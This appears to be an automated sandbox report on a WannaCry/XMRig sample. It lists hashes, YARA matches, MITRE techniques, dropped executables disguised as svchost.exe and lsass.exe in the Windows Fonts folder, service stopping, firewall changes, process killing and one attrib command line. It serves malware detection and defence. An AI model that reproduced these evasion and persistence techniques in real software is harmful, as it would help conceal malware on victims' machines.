wannacry | 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a

Analysis

max time kernel
151s
max time network
166s
platform
windows7_x64
resource
win7-20220414-en
submitted
08-07-2022 01:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
Size

2.3MB
MD5

7b4f33a283fc64db1227f5d82db91a59
SHA1

f32ae945c419e09e3320686f2b9b419c346d76a3
SHA256

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
SHA512

7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511

Score

10^/10

wannacry xmrig evasion miner ransomware upx worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command 3 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

svchost.exesvchost.exeKvMonXP.exe

pid process

2540 svchost.exe
3048 svchost.exe
1592 KvMonXP.exe

pid	process
2540	svchost.exe
3048	svchost.exe
1592	KvMonXP.exe

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1892-55-0x0000000000400000-0x0000000000656000-memory.dmp	xmrig
\??\c:\windows\Fonts\lsass.exe	xmrig
C:\Windows\Fonts\lsass.exe	xmrig
\Windows\Fonts\KvMonXP.exe	xmrig
C:\Windows\Fonts\KvMonXP.exe	xmrig

Executes dropped EXE 16 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeKvMonXP.exe

pid	process
1164	svchost.exe
1492	svchost.exe
1868	svchost.exe
664	svchost.exe
880	svchost.exe
1760	lsass.exe
2548	svchost.exe
2564	svchost.exe
2540	svchost.exe
2556	svchost.exe
2776	svchost.exe
3048	svchost.exe
3064	svchost.exe
3056	svchost.exe
2052	svchost.exe
1592	KvMonXP.exe

Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

2616 netsh.exe
2892 netsh.exe
2912 netsh.exe
3008 netsh.exe
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

3036 attrib.exe
3052 attrib.exe
2472 attrib.exe
2836 attrib.exe
2696 attrib.exe
2512 attrib.exe
2132 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2616	netsh.exe
2892	netsh.exe
2912	netsh.exe
3008	netsh.exe

pid	process
3036	attrib.exe
3052	attrib.exe
2472	attrib.exe
2836	attrib.exe
2696	attrib.exe
2512	attrib.exe
2132	attrib.exe

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/1164-113-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1492-114-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1868-115-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/664-116-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/880-132-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/664-134-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1492-135-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1164-139-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2548-149-0x0000000140000000-0x0000000140053000-memory.dmp	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2564-152-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2540-153-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2556-154-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral1/memory/2556-156-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
behavioral1/memory/3056-168-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2052-166-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2540-165-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/3048-170-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/1868-171-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/3064-172-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2776-173-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2564-174-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/880-175-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral1/memory/2776-176-0x0000000140000000-0x0000000140053000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

WScript.exe

pid process

1336 WScript.exe
Loads dropped DLL 10 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exesvchost.exe

pid process

1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
2596
2616
2604
2636
772
2132
2112
2056
2776 svchost.exe

pid	process
1336	WScript.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exeattrib.exeattrib.exeattrib.exeattrib.exelsass.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\lsass.exe	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\KvMonXP.exe	lsass.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\debug\lsmose.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\tasksche.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\svchost.exe	attrib.exe
File opened for modification	C:\windows\debug\svchost.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\svchost.exe	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2492	sc.exe
2948	sc.exe
1324	sc.exe
2020	sc.exe
2140	sc.exe
2712	sc.exe
3024	sc.exe
1844	sc.exe
1788	sc.exe
2156	sc.exe
1060	sc.exe
1700	sc.exe
1764	sc.exe
1544	sc.exe
2232	sc.exe
1716	sc.exe
1412	sc.exe
1236	sc.exe
2324	sc.exe
1112	sc.exe
2016	sc.exe
360	sc.exe
1716	sc.exe
1264	sc.exe
1956	sc.exe
1580	sc.exe
880	sc.exe
1260	sc.exe
2920	sc.exe
624	sc.exe
772	sc.exe
1888	sc.exe
1544	sc.exe
2340	sc.exe
3000	sc.exe
1792	sc.exe
276	sc.exe
524	sc.exe
2796	sc.exe
520	sc.exe
1800	sc.exe
2220	sc.exe
696	sc.exe
812	sc.exe
2300	sc.exe
2404	sc.exe
1704	sc.exe
2464	sc.exe
2824	sc.exe
2368	sc.exe
1412	sc.exe
1992	sc.exe
2208	sc.exe
2984	sc.exe
1644	sc.exe
1264	sc.exe
1464	sc.exe
2448	sc.exe
848	sc.exe
2892	sc.exe
2880	sc.exe
2936	sc.exe
1724	sc.exe
520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with WMI 23 IoCs

evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid	process
2120	WMIC.exe
2340	WMIC.exe
2332	WMIC.exe
2468	WMIC.exe
2744	WMIC.exe
1444	WMIC.exe
2316	WMIC.exe
2872	WMIC.exe
1524	WMIC.exe
2640	WMIC.exe
2112	WMIC.exe
2212	WMIC.exe
2244	WMIC.exe
2972	WMIC.exe
2232	WMIC.exe
2416	WMIC.exe
2588	WMIC.exe
2636	WMIC.exe
1036	WMIC.exe
2392	WMIC.exe
2728	WMIC.exe
2888	WMIC.exe
1996	WMIC.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1116	taskkill.exe
1804	taskkill.exe
2004	taskkill.exe
1300	taskkill.exe
1792	taskkill.exe
1892	taskkill.exe
2224	taskkill.exe
1932	taskkill.exe
1816	taskkill.exe
1952	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

lsass.exe

pid	process
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe
1760	lsass.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe
Token: SeIncBasePriorityPrivilege	1036	WMIC.exe
Token: SeCreatePagefilePrivilege	1036	WMIC.exe
Token: SeBackupPrivilege	1036	WMIC.exe
Token: SeRestorePrivilege	1036	WMIC.exe
Token: SeShutdownPrivilege	1036	WMIC.exe
Token: SeDebugPrivilege	1036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1036	WMIC.exe
Token: SeRemoteShutdownPrivilege	1036	WMIC.exe
Token: SeUndockPrivilege	1036	WMIC.exe
Token: SeManageVolumePrivilege	1036	WMIC.exe
Token: 33	1036	WMIC.exe
Token: 34	1036	WMIC.exe
Token: 35	1036	WMIC.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe
Token: SeIncBasePriorityPrivilege	1036	WMIC.exe
Token: SeCreatePagefilePrivilege	1036	WMIC.exe
Token: SeBackupPrivilege	1036	WMIC.exe
Token: SeRestorePrivilege	1036	WMIC.exe
Token: SeShutdownPrivilege	1036	WMIC.exe
Token: SeDebugPrivilege	1036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1036	WMIC.exe
Token: SeRemoteShutdownPrivilege	1036	WMIC.exe
Token: SeUndockPrivilege	1036	WMIC.exe
Token: SeManageVolumePrivilege	1036	WMIC.exe
Token: 33	1036	WMIC.exe
Token: 34	1036	WMIC.exe
Token: 35	1036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2120	WMIC.exe
Token: SeSecurityPrivilege	2120	WMIC.exe
Token: SeTakeOwnershipPrivilege	2120	WMIC.exe
Token: SeLoadDriverPrivilege	2120	WMIC.exe
Token: SeSystemProfilePrivilege	2120	WMIC.exe
Token: SeSystemtimePrivilege	2120	WMIC.exe
Token: SeProfSingleProcessPrivilege	2120	WMIC.exe
Token: SeIncBasePriorityPrivilege	2120	WMIC.exe
Token: SeCreatePagefilePrivilege	2120	WMIC.exe
Token: SeBackupPrivilege	2120	WMIC.exe
Token: SeRestorePrivilege	2120	WMIC.exe
Token: SeShutdownPrivilege	2120	WMIC.exe
Token: SeDebugPrivilege	2120	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2120	WMIC.exe
Token: SeRemoteShutdownPrivilege	2120	WMIC.exe
Token: SeUndockPrivilege	2120	WMIC.exe
Token: SeManageVolumePrivilege	2120	WMIC.exe
Token: 33	2120	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exelsass.exe

pid	process
1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
1760	lsass.exe
1760	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.execmd.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1892 wrote to memory of 688	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 1892 wrote to memory of 688	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 1892 wrote to memory of 688	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 1892 wrote to memory of 688	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	cmd.exe
PID 1892 wrote to memory of 1728	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1728	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1728	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1728	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1324	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1324	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1324	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1324	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1264	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1264	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1264	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1264	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1236	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1236	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1236	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1236	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 2028	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 2028	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 2028	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 2028	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 688 wrote to memory of 316	688	cmd.exe	attrib.exe
PID 688 wrote to memory of 316	688	cmd.exe	attrib.exe
PID 688 wrote to memory of 316	688	cmd.exe	attrib.exe
PID 688 wrote to memory of 316	688	cmd.exe	attrib.exe
PID 1728 wrote to memory of 568	1728	net.exe	net1.exe
PID 1728 wrote to memory of 568	1728	net.exe	net1.exe
PID 1728 wrote to memory of 568	1728	net.exe	net1.exe
PID 1728 wrote to memory of 568	1728	net.exe	net1.exe
PID 1892 wrote to memory of 520	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 520	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 520	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 520	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 580	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 580	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 580	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 580	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1264 wrote to memory of 1704	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1704	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1704	1264	net.exe	net1.exe
PID 1264 wrote to memory of 1704	1264	net.exe	net1.exe
PID 2028 wrote to memory of 368	2028	net.exe	net1.exe
PID 2028 wrote to memory of 368	2028	net.exe	net1.exe
PID 2028 wrote to memory of 368	2028	net.exe	net1.exe
PID 2028 wrote to memory of 368	2028	net.exe	net1.exe
PID 1892 wrote to memory of 1792	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1792	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1792	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1792	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1764	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1764	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1764	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1764	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	net.exe
PID 1892 wrote to memory of 1956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe
PID 1892 wrote to memory of 1956	1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe	sc.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
1692	attrib.exe
1712	attrib.exe
2656	attrib.exe
2808	attrib.exe
2864	attrib.exe
2800	attrib.exe
2608	attrib.exe
2360	attrib.exe
1424	attrib.exe
2444	attrib.exe
2528	attrib.exe
700	attrib.exe
1936	attrib.exe
2920	attrib.exe
3044	attrib.exe
1484	attrib.exe
2684	attrib.exe
1372	attrib.exe
1276	attrib.exe
1468	attrib.exe
2472	attrib.exe
2368	attrib.exe
2248	attrib.exe
2964	attrib.exe
1116	attrib.exe
2544	attrib.exe
2420	attrib.exe
2824	attrib.exe
2456	attrib.exe
1668	attrib.exe
2380	attrib.exe
2708	attrib.exe
2988	attrib.exe
2160	attrib.exe
832	attrib.exe
1596	attrib.exe
2212	attrib.exe
2836	attrib.exe
2292	attrib.exe
2612	attrib.exe
1324	attrib.exe
2320	attrib.exe
2700	attrib.exe
2856	attrib.exe
2544	attrib.exe
2052	attrib.exe
2200	attrib.exe
832	attrib.exe
2284	attrib.exe
2512	attrib.exe
2184	attrib.exe
2372	attrib.exe
2344	attrib.exe
2604	attrib.exe
316	attrib.exe
1852	attrib.exe
2600	attrib.exe
3000	attrib.exe
2308	attrib.exe
1300	attrib.exe
2556	attrib.exe
2088	attrib.exe
2720	attrib.exe
2552	attrib.exe

C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
"C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
- Suspicious use of WriteProcessMemory
